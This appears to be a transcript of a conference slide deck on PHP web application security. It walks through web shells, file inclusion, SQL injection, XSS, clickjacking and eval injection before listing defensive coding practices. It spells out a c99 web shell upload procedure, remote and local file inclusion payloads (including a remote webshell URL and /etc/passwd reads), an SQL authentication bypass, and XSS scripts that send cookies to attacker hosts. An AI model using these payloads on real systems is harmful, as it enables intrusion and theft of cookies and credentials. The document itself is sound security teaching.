This document discusses common web application vulnerabilities and methods for preventing hacking. It covers code injection attacks using C99 shell, file inclusion vulnerabilities through remote and local file access, dictionary attacks, SQL injections, cross-site scripting (XSS), clickjacking, dynamic code evaluation, and countermeasures like input validation, output encoding, prepared statements, and avoiding dangerous functions. The goal is to explain how applications are hacked and defensive coding practices to prevent attacks.

1. Prevent Hacking
By : Polaki Viswanath

2. Welcome
About Me
1. Drupal developer.
2. Been coding in php for about 6 years.
3. And been HACKED… a lot.
Goal of today’s talk
1. Why PHP is EVIL. Different ways we get hacked.
2. How to avoid being hacked and what is defencive coding style.

3. What will we discuss in today’s talk
1. Cool code injections by c99 shell, File inclusion vulnerability.
2. Dictionary attacks.
3. Sql injections.
4. Script injections like xss (cross site scripting), UI Redress (also Clickjacking)
5. Dynamic evaluation vulnerabilities.
6. How to avoid such attacks.

4. C99 Shell
Find a way to upload c99shell.php then see the magic!!!
For example:
1. Find an upload button.
2. Upload a php file having an upload field in a form with .png or .jpg extension.
3. Navigate to the uploaded file and upload the script file.
4. Run the uploaded c99 script file.
Source code found on: http://www.c99shellphp.com/

5. File Inclusion Vulnerability
This is categorised in 2 sub categories
1. Remote File Inclusion.
2. Local File Inclusion.

6. File Inclusion Vulnerability
<?php
if ( isset( $_GET['COLOR'] ) ) {
include( $_GET['COLOR'] . '.php' );
}
?>
<form method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
The developer intended only blue.php and red.php to be used as options. But it is possible to inject code from other files as anyone can insert
arbitrary values for the COLOR parameter.
/vulnerable.php?COLOR=http://evil.example.com/webshell.txt? - injects a remotely hosted file containing a malicious code.
/vulnerable.php?COLOR=C:ftpuploadexploit - Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)
/vulnerable.php?COLOR=C:notes.txt%00 - example using NULL meta character to remove the .php suffix, allowing access to files other than .php.
(Enabling magic_quotes_gpc limits the attack by escaping special characters, thus disabling the use of the NUL terminator)
/vulnerable.php?COLOR=/etc/passwd%00 - allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.

7. File Inclusion Vulnerability Cont...
For example:
<?php include("inc/" . $_GET['file']); ?>
Valid Inputs:
1. Including files in the same directory: ?file=.htaccess
2. Path Traversal: ?file=../../../../../../../../../var/lib/locate.db (this file is very interesting because it lets you search the
filesystem, other files)
3. Including injected PHP code: ?file=../../../../../../../../../var/log/apache/error.log
Some other examples:
<?php include("inc/" . $_GET['file'] . ".htm"); ?>
<?php include($_GET['file']); ?>
<?php include($_GET['file'] . ".htm"); ?>
<?php include("http://192.168.1.10/config.php"); ?>

8. Dictionary Attacks
A dictionary attack is a technique for defeating an authentication mechanism by
trying to determine its decryption key or passphrase by trying hundreds or
sometimes millions of likely possibilities, such as words in a dictionary.

9. Sql injections
Normal Query:
SELECT UserList.Username
FROM UserList
WHERE UserList.Username = 'Username'
AND UserList.Password = 'Password'
For an input of password' OR '1'='1 in password field
Modified Query:
SELECT UserList.Username
FROM UserList
WHERE UserList.Username = 'Username'
AND UserList.Password = 'password' OR '1'='1'

10. Cross-Site Scripting or xss attack
Valid Input:
Very nice site!
Modified version:
1. Nice site, I think I'll take it. <script>document.location="http://some_attacker/cookie.cgi?" +
document.cookie</script>
2. Very nice site! <script>document.write('<iframe src="http://evilattacker.com?cookie=' + document.cookie.escape() +
'" height=0 width=0 />');</script>

11. Clickjacking or UI Redress
A UI Redress attack is any attempt by an attacker to alter the User Interface of a
web application. Changing the UI that a user interacts with can allow an attacker
to inject new links, new HTML sections, to resize/hide/overlay interface elements,
and so on. When such attacks are intended to trick a user into clicking on an
injected button or link it is usually referred to as Clickjacking.

12. Dynamic evaluation vulnerabilities
Example code:
$myvar = 'somevalue';
$x = $_GET['arg'];
eval('$myvar = ' . $x . ';');
If "arg" is set to "10; system('/bin/echo uh-oh')", additional code is run which
executes a program on the server, in this case "/bin/echo".

13. Now what can we do?

14. The answer to big question
1. Proper monitoring of server, configurations and code review for loopholes.
2. Input validations, Include validations.
3. String escaping and Magic Quotes.
4. Use of prepared Statements.
5. Using exceptions and proper use of “ @ ” symbol, eval, extract, $$ symbol.
6. Avoid use of Backtick, system and eval functions.
7. Type juggling using “==” instead of “===”.

15. Thankyou ;)

16. Questions ?